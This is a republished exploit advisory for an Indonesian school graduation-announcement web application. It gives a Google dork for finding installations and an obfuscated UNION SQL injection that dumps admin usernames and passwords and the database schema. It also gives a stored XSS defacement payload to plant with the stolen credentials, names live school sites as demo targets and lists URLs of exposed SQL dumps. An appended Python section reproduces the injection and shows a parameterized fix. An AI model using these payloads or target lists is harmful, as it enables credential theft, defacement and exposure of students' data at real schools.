Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
2020-10-05 23:43:07 Author: cxsecurity.com (view original) Views: 139


#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
#Date: 2020-09-09
#Exploit Author: Gh05t666nero
#Vendor Homepage: https://github.com/slametbsan
#Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan
#Category: webapps
#Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01)
#Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip

#############################################

[*] SQL Injection

#Query:
Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8#

#Demo:
Demo 1: http://pengumuman.smkn1nabire.sch.id
Demo 2: http://smkn2bulik.sch.id/kelulusan
Demo 3: http://smkn2sampang.sch.id/kelulusan/19

#Proof of Concept:
Find a target with the dork above, then paste the query into the search form in the middle of the page and submit it. The injected UNION returns every "username :: password" pair from the un_user table (the hex literals 0x203a3a20 and 0x3c62723e decode to " :: " and "<br>"), and its seventh column lists every column_name<br>table_name pair of the current database from information_schema.columns.

#Login Page:
The admin login page is at the /admin path.

#############################################

[*] Cross Site Scripting [STORED]

#Payload:
<br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1>

#Proof of Concept:
Log in to the admin dashboard with the credentials obtained from the SQL injection above and open the Konfigurasi menu. Click the Edit button first, enter the payload in the Nama Sekolah field and click Save. The payload is stored and executes whenever the page is rendered.

#############################################

[*] Database Information Disclosure

#Example Bug:
The SQL dump un2016.sql is reachable under the application's web root on the installations below:
http://www.mikrotik.smkn3garut.sch.id/un2016.sql
http://smkn2bulik.sch.id/kelulusan/un2016.sql
http://kelulusan.smkn1jati.sch.id/un2016.sql

#############################################

Contact Me:- [email protected]
Instagram:- @ojan_xploit
Telegram:- @Gh05t666nero1
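The following is an added example, not code from the advisory or from the kelulusan project. It models the lookup pattern the SQL injection above relies on: user input concatenated into the WHERE clause of an eight-column SELECT, so a quote closes the string literal and a UNION appended to the input dumps the un_user table. The table name un_user, its username/password columns and the eight-column width are taken from the advisory's payload; the un_nilai results table, its columns, the sample rows and the concatenated-query style are assumptions chosen to make a stand-in that runs on SQLite. The MySQL-only parts of the original payload (the @x accumulator, information_schema.columns, group_concat, the trailing # comment) are not reproduced; a plain UNION SELECT with "--" as the comment is enough to show the credential dump, and the parameterized version beside it shows the same input being treated as a harmless literal.

```python
"""Added example: injectable vs. parameterized lookup in the shape the advisory's
UNION payload targets. Schema, rows and column names other than un_user,
username and password are constructed assumptions, not the real app's."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account and one exam-result row."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        -- Table and column names taken from the advisory's payload.
        CREATE TABLE un_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO un_user (username, password) VALUES ('admin', 'admin123');

        -- Hypothetical results table with 8 columns, matching the 8-column UNION.
        CREATE TABLE un_nilai (
            id INTEGER PRIMARY KEY, nisn TEXT, nama TEXT, kelas TEXT,
            nilai1 REAL, nilai2 REAL, nilai3 REAL, status TEXT
        );
        INSERT INTO un_nilai VALUES (1, '0012345678', 'Budi', 'XII-A', 80, 75, 90, 'LULUS');
        """
    )
    return con


def vulnerable_lookup(con: sqlite3.Connection, nisn: str) -> list:
    """Builds the query by string concatenation (assumed to mirror the app).
    A quote in the input ends the literal and the rest becomes SQL."""
    sql = "SELECT * FROM un_nilai WHERE nisn = '" + nisn + "'"
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, nisn: str) -> list:
    """Same query with a bound parameter: the input is always one string
    literal, whatever characters it contains."""
    return con.execute("SELECT * FROM un_nilai WHERE nisn = ?", (nisn,)).fetchall()


# Same shape as the advisory's payload: close the string, add a tautology, then
# UNION in the credentials with six filler columns to match the 8-column width.
# The trailing "--" comments out the closing quote the application appends.
PAYLOAD = (
    "x' OR '1'='1' UNION SELECT username, password, 3, 4, 5, 6, 7, 8 "
    "FROM un_user--"
)


def dumped_credentials(con: sqlite3.Connection) -> list:
    """Returns the (username, password) pairs the injection leaks, i.e. the
    rows in the result that are not genuine un_nilai rows."""
    legit = set(con.execute("SELECT * FROM un_nilai").fetchall())
    rows = vulnerable_lookup(con, PAYLOAD)
    return [(r[0], r[1]) for r in rows if tuple(r) not in legit]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", dumped_credentials(db))   # credentials leak
    print("safe:", safe_lookup(db, PAYLOAD))        # no rows, input is a literal
```

The fix is the one-line change in safe_lookup: bind the value instead of concatenating it. Filter-evasion tricks in the original payload (the /**/ comments, the .0union spelling, the %26-encoded ampersand) only matter against a blacklist in front of a concatenated query; a bound parameter needs no such filter.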





Source: https://cxsecurity.com/issue/WLB-2020100029